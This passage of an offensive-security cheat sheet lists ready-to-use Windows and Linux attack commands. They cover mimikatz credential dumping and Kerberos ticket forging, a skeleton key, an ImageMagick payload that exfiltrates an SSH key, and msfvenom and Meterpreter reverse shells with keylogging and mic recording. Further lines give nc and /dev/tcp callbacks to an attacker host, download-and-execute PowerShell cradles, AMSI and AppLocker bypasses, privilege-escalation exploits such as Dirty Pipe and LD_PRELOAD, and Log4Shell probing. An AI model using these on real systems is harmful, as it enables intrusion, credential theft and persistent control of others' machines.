sekurlsa::LogonPasswords
meterpreter > getprivs
meterpreter > creds_all
meterpreter > golden_ticket_create

Pass the Ticket

.\mimikatz.exe
mimikatz # sekurlsa::tickets /export
mimikatz # kerberos::ptt [0;76126]-2-0-40e10000-Administrator@krbtgt-<RHOST>.LOCAL.kirbi
klist
dir \\<RHOST>\admin$

Forging Golden Ticket

C:\> .\mimikatz.exe
mimikatz # privilege::debug
mimikatz # lsadump::lsa /inject /name:krbtgt
mimikatz # kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500
mimikatz # misc::cmd
klist
dir \\<RHOST>\admin$

Skeleton Key

mimikatz # privilege::debug
mimikatz # misc::skeleton
net use C:\\<RHOST>\admin$ /user:Administrator mimikatz
dir \\<RHOST>\c$ /user:<USERNAME> mimikatz

pypykatz

pypykatz lsa minidump lsass.dmp

Exploitation Tools

ImageTragick

https://imagetragick.com/

MSL / Polyglot Attack

https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html

poc.svg

<image authenticate='ff" `echo $(cat /home/<USERNAME>/.ssh/id_rsa)> /dev/shm/id_rsa`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="msl:poc.svg" height="100" width="100"/>
  </svg>
</image>

convert poc.svg poc.png
cp /tmp/poc.svg /var/www/html/convert_images/

Metasploit

$ sudo msfdb run                   // start database
$ sudo msfdb init                  // database initialization
$ msfdb --use-defaults delete      // delete existing databases
$ msfdb --use-defaults init        // database initialization
$ msfdb status                     // database status
msf6> workspace                    // metasploit workspaces
msf6> workspace -a <WORKSPACE>     // add a workspace
msf6> workspace -r <WORKSPACE>     // rename a workspace
msf6> workspace -d <WORKSPACE>     // delete a workspace
msf6> workspace -D                 // delete all workspaces
msf6> db_nmap <OPTIONS>            // execute nmap and add output to database
msf6> hosts                        // reads hosts from database
msf6> services                     // reads services from database
msf6 > vulns                       // displaying vulnerabilities
msf6 > search                      // search within metasploit
msf6 > set RHOST <RHOST>           // set remote host
msf6 > set RPORT <RPORT>           // set remote port
msf6 > run                         // run exploit
msf6 > spool /PATH/TO/FILE         // recording screen output
msf6 > save                        // saves current state
msf6 > exploit                     // using module exploit
msf6 > payload                     // using module payload
msf6 > auxiliary                   // using module auxiliary
msf6 > encoder                     // using module encoder
msf6 > nop                         // using module nop
msf6 > show sessions               // displays all current sessions
msf6 > sessions -i 1               // switch to session 1
msf6 > sessions -u <ID>            // upgrading shell to meterpreter
msf6 > sessions -k <ID>            // kill specific session
msf6 > sessions -K                 // kill all sessions
msf6 > jobs                        // showing all current jobs
msf6 > show payloads               // displaying available payloads
msf6 > set VERBOSE true            // enable verbose output
msf6 > set forceexploit true       // exploits the target anyways
msf6 > use post/PATH/TO/MODULE     // use post exploitation module
msf6 > use post/linux/gather/hashdump    // use hashdump for Linux
msf6 > use post/multi/manage/shell_to_meterpreter    // shell to meterpreter
msf6 > use exploit/windows/http/oracle_event_processing_upload    // use a specific module
C:\> > Ctrl + z                                  // put active meterpreter shell in background
meterpreter > background                         // put meterpreter in background (same as "bg")
meterpreter > shell                              // get a system shell
meterpreter > channel -i <ID>                    // get back to existing meterpreter shell
meterpreter > ps                                 // checking processes
meterpreter > migrate 2236                       // migrate to a process
meterpreter > getuid                             // get the user id
meterpreter > sysinfo                            // get system information
meterpreter > search -f <FILE>                   // search for a file
meterpreter > upload                             // uploading local files to the target
meterpreter > ipconfig                           // get network configuration
meterpreter > load powershell                    // loads powershell
meterpreter > powershell_shell                   // follow-up command for load powershell
meterpreter > load kiwi                          // load mimikatz
meterpreter > getprivs                           // get privileges after loading mimikatz
meterpreter > getsystem                          // gain system privileges if user is member of administrator group
meterpreter > hashdump                           // dumps all the user hashes
meterpreter > run post/windows/gather/checkvm    // check status of the target
meterpreter > run post/multi/recon/local_exploit_suggester    // checking for exploits
meterpreter > run post/windows/manage/enable_rdp              // enables rdp
meterpreter > run post/multi/manage/autoroute                 // runs autoroutes
meterpreter > run auxiliary/server/socks4a                    // runs socks4 proxy server
meterpreter > keyscan_start                                   // enabled keylogger
meterpreter > keyscan_dump                                    // showing the output
meterpreter > screenshare                                     // realtime screen sharing
meterpreter > screenshare -q 100                              // realtime screen sharing
meterpreter > record_mic                                      // recording mic output
meterpreter > timestomp                                       // modify timestamps
meterpreter > execute -f calc.exe                             // starts a program on the victim
meterpreter > portfwd add -l <LPORT> -p <RPORT> -r 127.0.0.1    // port forwarding

Metasploit through Proxychains

proxychains -q msfconsole

Auxiliary Output Directory

/home/<USERNAME>/.msf4/loot/20200623090635_default_<RHOST>_nvms.traversal_680948.txt

Meterpreter Listener

Generate Payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o meterpreter_payload.exe

Setup Listener for Microsoft Windows

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <LHOST>
LHOST => <LHOST>
msf6 exploit(multi/handler) > set LPORT <LPORT>
LPORT => <LPORT>
msf6 exploit(multi/handler) > run

Download Files

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o <FILE>exe

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <LHOST>
LHOST => <LHOST>
msf6 exploit(multi/handler) > set LPORT <LPORT>
LPORT => <LPORT>
msf6 exploit(multi/handler) > run

.\<FILE>.exe

meterpreter > download *

Post Exploitation

AMSI

$str = 'amsiinitfailed'
$str = 'ams' + 'ii' + 'nitf' + 'ailed'

AppLocker Bypass List

Bypass List (Windows 10 Build 1803):
C:\Windows\Tasks
C:\Windows\Temp
C:\windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated (after peforming a version upgrade of Windows 10)
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System

autologon

powershell -c "$SecPass = Convertto-securestring 'Welcome1!' -AsPlainText -Force;$cred=New-Object System.Management.Automation.PScredential('administrator', $SecPass);Start-Process -FilePath 'C:\Users\Public\Downloads\nc.exe' -argumentlist '-e cmd <LHOST> <LPORT>' -Credential $cred"

Bash Privilege Escalation

sudo -u#-1 /bin/bash

Basic Linux Enumeration

id
sudo -l
uname -a
cat /etc/hosts
cat /etc/fstab
cat /etc/passwd
ss -tulpn
ps -auxf
ls -lahv
ls -R /home

Basic Windows Enumeration

systeminfo
whoami /all
net users
net users <USERNAME>
tasklist /SVC
sc query
sc qc <SERVICE>
netsh firewall show state
schtasks /query /fo LIST /v
findstr /si password *.xml *.ini *.txt
dir /s *pass* == *cred* == *vnc* == *.config*
accesschk.exe -uws "Everyone" "C:\Program Files"
wmic qfe get Caption,Description,HotFixID,InstalledOn
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path

Credential Files

https://twitter.com/NinjaParanoid/status/1516442028963659777?t=g7ed0vt6ER8nS75qd-g0sQ&s=09

https://www.nirsoft.net/utils/credentials_file_view.html

cmdkey /list
rundll32 keymgr.dll, KRShowKeyMgr
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
reg query HKEY_CURRENT_USER\Software\<USERNAME>\PuTTY\Sessions\ /f "Proxy" /s

Evil-WinRM

evil-winrm -i <RHOST> -u <USERNAME> -p <PASSWORD>
evil-winrm -i <RHOST> -c /PATH/TO/CERTIFICATE/<CERTIFICATE>.crt -k /PATH/TO/PRIVATE/KEY/<KEY>.key -p -u -S

find Commands

Specific Size

find / -size 50M    // find files with a size of 50MB

Modified Files

find / -mtime 10    // find modified files in the last 10 days
find / -atime 10    // find accessed files in the last 10 days
find / -cmin -60    // find files changed within the last 60 minutes
find / -amin -60    // find files accesses within the last 60 minutes

Passwords

find ./ -type f -exec grep --color=always -i -I 'password' {} \;

Group Permissions

find / -group <group> 2>/dev/null

User specific Files

find / -user <USERNAME> 2>/dev/null
find / -user <USERNAME> -ls 2>/dev/null
find / -user <USERNAME> 2>/dev/null | grep -v proc 2>/dev/null
find / -user <USERNAME> -ls 2>/dev/null | grep -v proc 2>/dev/null

SUID and SGID Files

find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null | xargs ls -la
find / -type f -user root -perm -4000 2>/dev/null

grep for Passwords

grep -R db_passwd
grep -roiE "password.{20}"
grep -oiE "password.{20}" /etc/*.conf
grep -v "^[#;]" /PATH/TO/FILE | grep -v "^$"    // grep for passwords like "DBPassword:"

Impacket

impacket-smbserver local . -smb2support
impacket-reg <DOMAIN>/<USERNAME>:<PASSWORD:PASSWORD_HASH>@<RHOST> <ACTION> <ACTION>
impacket-services <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST> <ACTION>
impacket-netview <DOMAIN>/<USERNAME> -targets /PATH/TO/FILE/<FILE>.txt -users /PATH/TO/FILE/<FILE>.txt
impacket-lookupsid <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
impacket-GetADUsers -all -dc-ip <RHOST> <DOMAIN>/
impacket-getST <DOMAIN>/<USERNAME>$  -spn WWW/<DOMAIN_CONTROLLER>.<DOMAIN> -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator
impacket-rpcdump <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
impacket-samrdump <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
impacket-atexec -k -no-pass <DOMAIN>/Administrator@<DOMAIN_CONTROLLER>.<DOMAIN> 'type C:\PATH\TO\FILE\<FILE>'

impacket-smbclient

export KRB5CCNAME=<USERNAME>.ccache
impacket-smbclient <RHOST>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
impacket-smbclient -k <RHOST>/<USERNAME>@<RHOST>.<RHOST> -no-pass

impacket-getTGT

impacket-getTGT <RHOST>/<USERNAME>:<PASSWORD>
impacket-getTGT <RHOST>/<USERNAME> -dc-ip <RHOST> -hashes aad3b435b51404eeaad3b435b51404ee:7c662956a4a0486a80fbb2403c5a9c2c

impacket-GetNPUsers

impacket-GetNPUsers <RHOST>/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
impacket-GetNPUsers <RHOST>/<USERNAME> -request -no-pass -dc-ip <RHOST>
impacket-GetNPUsers <RHOST>/ -usersfile usernames.txt -format john -outputfile hashes

impacket-getUserSPNs / GetUserSPNs.py

export KRB5CCNAME=<USERNAME>.ccache
impacket-GetUserSPNs <RHOST>/<USERNAME>:<PASSWORD> -k -dc-ip <RHOST>.<RHOST> -no-pass -request
./GetUserSPNs.py <RHOST>/<USERNAME>:<PASSWORD> -k -dc-ip <RHOST>.<RHOST> -no-pass -request

impacket-secretsdump

export KRB5CCNAME=<USERNAME>.ccache
impacket-secretsdump <RHOST>/<USERNAME>@<RHOST>
impacket-secretsdump -k <RHOST>/<USERNAME>@<RHOST>.<RHOST> -no-pass -debug
impacket-secretsdump -ntds ndts.dit -system system -hashes lmhash:nthash LOCAL -output nt-hash
impacket-secretsdump -dc-ip <RHOST> <RHOST>.LOCAL/svc_bes:<PASSWORD>@<RHOST>
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL

impacket-psexec

impacket-psexec <USERNAME>@<RHOST>
impacket-psexec <RHOST>/administrator@<RHOST> -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18

impacket-ticketer

Requirements

Valid User
NTHASH
Domain-SID

export KRB5CCNAME=<USERNAME>.ccache
impacket-ticketer -nthash C1929E1263DDFF6A2BCC6E053E705F78 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain <RHOST> -spn MSSQLSVC/<RHOST>.<RHOST> -user-id 500 Administrator

Fixing [-] exceptions must derive from BaseException

Issue

./GetUserSPNs.py <RHOST>/<USERNAME>:<PASSWORD> -k -dc-ip <DOMAIN_CONTROLLER>.<RHOST> -no-pass -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] exceptions must derive from BaseException

How to fix it

241         if self.__doKerberos:
242             #target = self.getMachineName()
243             target = self.__kdcHost

Internet Information Service (IIS)

Application Pool Credential Dumping

C:\Windows\System32\inetsrv>appcmd.exe list apppool /@:*

JAWS

IEX(New-Object Net.webclient).downloadString('http://<LHOST>:<LPORT>/jaws-enum.ps1')

Kerberos

https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a

Bruteforce

./kerbrute -domain <DOMAIN> -users <FILE> -passwords <FILE> -outputfile <FILE>

With List of Users

.\Rubeus.exe brute /users:<FILE> /passwords:<FILE> /domain:<DOMAIN> /outfile:<FILE>

Check Passwords for all Users in Domain

.\Rubeus.exe brute /passwords:<FILE> /outfile:<FILE>

ASPREPRoast

Check ASPREPRoast for all Domain Users (Credentials required)

impacket-GetNPUsers <DOMAIN>/<USERNAME>:<PASSWORD> -request -format hashcat -outputfile <FILE>
impacket-GetNPUsers <DOMAIN>/<USERNAME>:<PASSWORD> -request -format john -outputfile <FILE>

Check ASPREPRoast for a List of Users (No Credentials required)

impacket-GetNPUsers <DOMAIN>/ -usersfile <FILE> -format hashcat -outputfile <FILE>
impacket-GetNPUsers <DOMAIN>/ -usersfile <FILE> -format john -outputfile <FILE>

Check ASPREPRoast for all Domain Users in Domain

.\Rubeus.exe asreproast  /format:hashcat /outfile:<FILE>

Kerberoasting

python GetUserSPNs.py <DOMAIN>/<USERNAME>:<PASSWORD> -outputfile <FILE>
.\Rubeus.exe kerberoast /outfile:<FILE>
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII <FILE>
Invoke-Kerberoast -OutputFormat john | % { $_.Hash } | Out-File -Encoding ASCII <FILE>

Overpass The Hash/Pass The Key (PTK)

Request TGT with Hash

impacket-getTGT <DOMAIN>/<USERNAME> -hashes <LMHASH>:<NTLMHASH>

Request TGT with aesKey (More secure Encryption, probably more stealth due is it used by Default)

impacket-getTGT <DOMAIN>/<USERNAME> -aesKey <KEY>

Request TGT with Password

impacket-getTGT <DOMAIN>/<USERNAME>:<PASSWORD>

Set TGT for Impacket Usage

export KRB5CCNAME=<USERNAME>.ccache

Execute Remote Commands

impacket-psexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
impacket-smbexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
impacket-wmiexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass

Ask and inject the Ticket

.\Rubeus.exe asktgt /domain:<DOMAIN> /user:<USERNAME> /rc4:<NTLMHASH> /ptt

Execute a CMD on Remote Host

.\PsExec.exe -accepteula \\<RHOST> cmd

Pass The Ticket (PTT)

Harvest Tickets from Linux

Check Type and Location of Tickets

grep default_ccache_name /etc/krb5.conf

If none return, default is FILE:/tmp/krb5cc_%{uid}
In Case of File Tickets it is possible to Copy-Paste them to use them
In Case of being KEYRING Tickets, the Tool tickey can be used to get them
To dump User Tickets, if root, it is recommended to dump them all by injecting in other user processes
To inject, the Ticket have to be copied in a reachable Folder by all Users

cp tickey /tmp/tickey
/tmp/tickey -i

Harvest Tickets from Windows

mimikatz # sekurlsa::tickets /export
.\Rubeus dump

Convert Tickets dumped with Rubeus into base64

[IO.File]::WriteAllBytes("<TICKET>.kirbi", [Convert]::FromBase64String("<TICKET>"))

Convert Tickets between Linux and Windows Format with ticket_converter.py

https://github.com/Zer1t0/ticket_converter

python ticket_converter.py ticket.kirbi ticket.ccache
python ticket_converter.py ticket.ccache ticket.kirbi

Using Ticket on Linux

export KRB5CCNAME=<USERNAME>.ccache

Execute Remote Commands by using TGT

impacket-psexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
impacket-smbexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
impacket-wmiexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass

Using Ticket on Windows

Inject Ticket with mimikatz

mimikatz # kerberos::ptt <KIRBI_FILE>

Inject Ticket with Rubeus

.\Rubeus.exe ptt /ticket:<KIRBI_FILE>

Execute a CMD on Remote Host

.\PsExec.exe -accepteula \\<RHOST> cmd

Silver Ticket

Impacket Examples

Generate TGS with NTLM

python ticketer.py -nthash <NTLMHASH> -domain-sid <SID> -domain <DOMAIN> -spn <SPN>  <USERNAME>

Generate TGS with aesKey

python ticketer.py -aesKey <KEY> -domain-sid <SID> -domain <DOMAIN> -spn <SPN>  <USERNAME>

Set the ticket for impacket use

export KRB5CCNAME=<USERNAME>.ccache

Execute Remote Commands by using TGT

impacket-psexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
impacket-smbexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
impacket-wmiexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass

mimikatz Examples

Generate TGS with NTLM

mimikatz # kerberos::golden /domain:<DOMAIN>/sid:<SID> /rc4:<NTLMHASH> /user:<USERNAME> /service:<SERVICE> /target:<RHOST>

Generate TGS with AES 128bit Key

mimikatz # kerberos::golden /domain:<DOMAIN>/sid:<SID> /aes128:<KEY> /user:<USERNAME> /service:<SERVICE> /target:<RHOST>

Generate TGS with AES 256bit Key (More secure Encryption, probably more stealth due is it used by Default)

mimikatz # kerberos::golden /domain:<DOMAIN>/sid:<SID> /aes256:<KEY> /user:<USERNAME> /service:<SERVICE> /target:<RHOST>

Inject TGS with Mimikatz

mimikatz # kerberos::ptt <KIRBI_FILE>

Rubeus Examples

.\Rubeus.exe ptt /ticket:<KIRBI_FILE>

Execute CMD on Remote Host

.\PsExec.exe -accepteula \\<RHOST> cmd

Golden Ticket

Impacket Examples

Generate TGT with NTLM

python ticketer.py -nthash <KRBTGT_NTLM_HASH> -domain-sid <SID> -domain <DOMAIN>  <USERNAME>

Generate TGT with aesKey

python ticketer.py -aesKey <KEY> -domain-sid <SID> -domain <DOMAIN>  <USERNAME>

Set TGT for Impacket Usage

export KRB5CCNAME=<USERNAME>.ccache

Execute Remote Commands by using TGT

impacket-psexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
impacket-smbexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
impacket-wmiexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass

mimikatz Examples

Generate TGT with NTLM

mimikatz # kerberos::golden /domain:<DOMAIN>/sid:<SID> /rc4:<KRBTGT_NTLM_HASH> /user:<USERNAME>

Generate TGT with AES 128bit Key

mimikatz # kerberos::golden /domain:<DOMAIN>/sid:<SID> /aes128:<KEY> /user:<USERNAME>

Generate TGT with AES 256bit Key (More secure Encryption, probably more stealth due is it used by Default)

mimikatz # kerberos::golden /domain:<DOMAIN>/sid:<SID> /aes256:<KEY> /user:<USERNAME>

Inject TGT with Mimikatz

mimikatz # kerberos::ptt <KIRBI_FILE>

Rubeus Examples

Inject Ticket with Rubeus

.\Rubeus.exe ptt /ticket:<KIRBI_FILE>

Execute CMD on Remote Host

.\PsExec.exe -accepteula \\<RHOST> cmd

Get NTLM from Password

python -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "<PASSWORD>".encode("utf-16le")).digest())'

LD_Preload

https://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}

$ gcc -fPIC -shared -o shell.so shell.c -nostartfiles
$ ls -la shell.so
$ sudo LD_PRELOAD=/tmp/shell.so find
$ sudo LD_PRELOAD=/tmp/shell.so /opt/<FILE>.sh

Linux Wildcards

https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt

$ touch -- --checkpoint=1
$ touch -- '--checkpoint-action=exec=sh shell.sh'
$ rm ./'--checkpoint-action=exec=python script.sh'

logrotten

https://github.com/whotwagner/logrotten

if [ `id -u` -eq 0 ]; then ( /bin/sh -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1 ); fi

If "create"-option is set in logrotate.cfg

./logrotten -p ./payloadfile /tmp/log/pwnme.log

If "compress"-option is set in logrotate.cfg

./logrotten -p ./payloadfile -c -s 4 /tmp/log/pwnme.log

Lsass

Dump

tasklist
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 688 C:\Users\Administrator\Documents\lsass.dmp full

Path Variable Hijacking

find / -perm -u=s -type f 2>/dev/null
find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
export PATH=$(pwd):$PATH

PowerShell

Common Commands

whoami /all
getuserid
systeminfo
Get-Process
net users
net users <USERNAME>
Get-ADUser -Filter * -SearchBase "DC=<DOMAIN>,DC=LOCAL"
Get-Content <FILE>
Get-ChildItem . -Force
GCI -hidden
[convert]::ToBase64String((Get-Content -path "<FILE>" -Encoding byte))

Allow Script Execution

set-executionpolicy remotesigned
Set-ExecutionPolicy unrestricted

Script Execution Bypass

powershell.exe -noprofile -executionpolicy bypass -file .\<FILE>.ps1

Import Module to PowerShell cmdlet

import-module ./<module / powershell script>

Check PowerShell Versions

Set-ExecutionPolicy Unrestricted
powershell -Command "$PSVersionTable.PSVersion"
powershell -c "[Environment]::Is64BitProcess"

Read PowerShell History

type C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Create a .zip-File

Compress-Archive -LiteralPath C:\PATH\TO\FOLDER\<FOLDER> -DestinationPath C:\PATH\TO\FILE<FILE>.zip

Start offsec Session

$offsec_session = New-PSSession -ComputerName <RHOST> -Authentication Negotiate -Credential <USERNAME>
Enter-PSSession $offsec_session

Execute Command as another User

$username = '<USERNAME>'
$password = '<PASSWORD>'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Process powershell.exe -Credential $credential

powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"

Add new Domain Administrator

$PASSWORD= ConvertTo-SecureString –AsPlainText -Force -String <PASSWORD>
New-ADUser -Name "<USERNAME>" -Description "<DESCRIPTION>" -Enabled $true -AccountPassword $PASSWORD
Add-ADGroupMember -Identity "Domain Admins" -Member <USERNAME>

Execute Commands in User Context

$pass = ConvertTo-SecureString "<PASSWORD>" -AsPlaintext -Force
$cred = New-Object System.Management.Automation.PSCredential ("<DOMAIN>\<USERNAME>", $pass)
Invoke-Command -computername <COMPUTERNAME> -ConfigurationName dc_manage -credential $cred -command {whoami}

Execute Scripts with Credentials (Reverse Shell)

$pass = ConvertTo-SecureString "<PASSWORD>" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("<DOMAIN>\<USERNAME>", $pass)
Invoke-Command -Computer <RHOST> -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http://<LHOST>/<FILE>.ps1') } -Credential $cred

pwncat

(local) pwncat$ back    // get back to shell
Ctrl+d                  // get back to pwncat shell

pwncat-cs -lp <LPORT>
(local) pwncat$ download /PATH/TO/FILE/<FILE> .
(local) pwncat$ upload /PATH/TO/FILE/<FILE> /PATH/TO/FILE/<FILE>

regedit

Dumping Credentials

reg save hklm\system system
reg save hklm\sam sam
reg.exe save hklm\sam c:\temp\sam.save
reg.exe save hklm\security c:\temp\security.save
reg.exe save hklm\system c:\temp\system.save

Rubeus

Overpass the Hash

Rubeus.exe kerberoast /user:<USERNAME>

Pass the Hash

.\Rubeus.exe asktgt /user:Administrator /certificate:7F052EB0D5D122CEF162FAE8233D6A0ED73ADA2E /getcredentials

RunasCs

./RunasCs.exe -l 3 -d <DOMAIN> "<USERNAME>" '<PASSWORD>' 'C:\Users\<USERNAME>\Downloads\<FILE>.exe'
./RunasCs.exe -d <DOMAIN> "<USERNAME>" '<PASSWORD>' cmd.exe -r <LHOST>:<LPORT>

SeBackup and SeRestore Privilege

Backup SAM and SYSTEM Hashes

reg save hklm\system C:\Users\<USERNAME>\system.hive
reg save hklm\sam C:\Users\<USERNAME>\sam.hive

Dumping Hashes

secretsdump.py -sam sam.hive -system system.hive LOCAL

Pass the Hash

psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94 administrator@<RHOST>

SeBackupPrivilege Privilege Escalation (diskshadow)

https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug

Script for PowerShell Environment

SET CONTEXT PERSISTENT NOWRITERSp
add volume c: alias foobarp
createp
expose %foobar% z:p

diskshadow /s <FILE>.txt

Copy ntds.dit

Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ndts.dit

Export System Registry Value

reg save HKLM\SYSTEM c:\temp\system

Download ndts.dit and system and get the hashes from secretsdump.py of the impacket-suite.

SeTakeOwnership Privilege

takeown /f C:\Windows\System32\Utilman.exe

icacls C:\Windows\System32\Utilman.exe /grant Everyone:F

C:\Windows\System32\> copy cmd.exe utilman.exe

Click the Ease of Access button on the logon screen to get a shell with NT Authority\System privileges.

SeImpersonate and SeAssignPrimaryToken Privilege

https://github.com/antonioCoco/RogueWinRM

.\RogueWinRM.exe -p "C:\> .\nc64.exe" -a "-e cmd.exe <LHOST> <LPORT>"

Unquoted Service Paths

Search for Unquoted Service Paths by using sc qc.

sc qc
sc qc WindowsScheduler
sc stop WindowsScheduler
sc start WindowsScheduler

icacls <PROGRAM>.exe
icacls C:\PROGRA~2\SYSTEM~1\<SERVICE>.exe
icacls C:\PROGRA~2\SYSTEM~1\<SERVICE>.exe /grant Everyone:F

Windows Tasks & Services

tasklist /SVC
netsh firewall show state
schtasks /query /fo LIST /v
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path

sc query
sc qc <service-name>
accesschk.exe -uws "Everyone" "C:\Program Files"

dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt

wmic qfe get Caption,Description,HotFixID,InstalledOn    # no new patches - KEXP pretty likely

Writeable Directories in Linux

/dev/shm
/tmp

writeDACL

https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/

Usage

$SecPassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USERNAME>', $SecPassword)
Add-ObjectACL -PrincipalIdentity <USERNAME> -Credential $Cred -Rights DCSync

CVE

Dirty Pipe (CVE-2022-0847)

gcc -o dirtypipe dirtypipe.c
./dirtypipe /etc/passwd 1 ootz:
su rootz

Juicy Potato

msfvenom and Metasploit Execution

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -b "\x00\x0a" -a x86 --platform windows -f exe -o exploit.exe

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <LHOST>
msf6 exploit(multi/handler) > set LPORT <LHOST>
msf6 exploit(multi/handler) > run

.\exploit.exe

[*] Sending stage (175174 bytes) to <RHOST>
[*] Meterpreter session 1 opened (<LHOST>:<LPORT> -> <RHOST>:51990) at 2021-01-31 12:36:26 +0100

Log4j / Log4Shell (CVE-2021-44228)

cat targets.txt | while read host do; do curl -sk --insecure --path-as-is "$host/?test=${jndi:[ldap://TOKEN.canarytokens.com/a](ldap://TOKEN.canarytokens.com/a)}" -H "X-Api-Version: ${jndi:[ldap://TOKEN.canarytokens.com/a](ldap://TOKEN.canarytokens.com/a)}" -H "User-Agent: ${jndi:[ldap://TOKEN.canarytokens.com/a](ldap://TOKEN.canarytokens.com/a)}";done

Preparation

http://mirrors.rootpei.com/jdk/

File: jdk-8u181-linux-x64.tar.gz

Creating Library Folder

sudo mkdir /usr/lib/jvm
cd /usr/lib/jvm
sudo tar xzvf /usr/lib/jvm/jdk-8u181-linux-x64.tar.gz
sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_181/bin/java" 1
sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_181/bin/javac" 1
sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_181/bin/javaws" 1
sudo update-alternatives --set java /usr/lib/jvm/jdk1.8.0_181/bin/java
sudo update-alternatives --set javac /usr/lib/jvm/jdk1.8.0_181/bin/javac
sudo update-alternatives --set javaws /usr/lib/jvm/jdk1.8.0_181/bin/javaws

Verify Version

java -version

Get Exploit Framework

git clone https://github.com/mbechler/marshalsec
cd /opt/08_exploitation_tools/marshalsec/
sudo apt-get install maven
